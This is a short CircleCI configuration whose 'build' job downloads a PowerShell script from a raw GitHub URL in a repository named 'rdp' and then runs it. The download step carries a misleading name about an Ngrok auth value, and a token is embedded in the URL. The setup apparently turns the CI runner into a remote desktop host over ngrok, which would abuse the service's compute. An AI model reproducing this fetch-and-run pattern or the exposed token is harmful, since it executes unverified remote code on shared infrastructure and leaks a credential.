version: 2.1
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: Paste Ngrok Auth Value In Hosted Link
          command: |      
            Invoke-WebRequest https://raw.githubusercontent.com/mepsy44/rdp/main/rdp?

token=GHSAT0AAAAAABX3JWHYEWGVE7QN3D7ZZWAOYYBHXNA -OutFile gpu.ps1 
          
      - run: ./gpu.ps1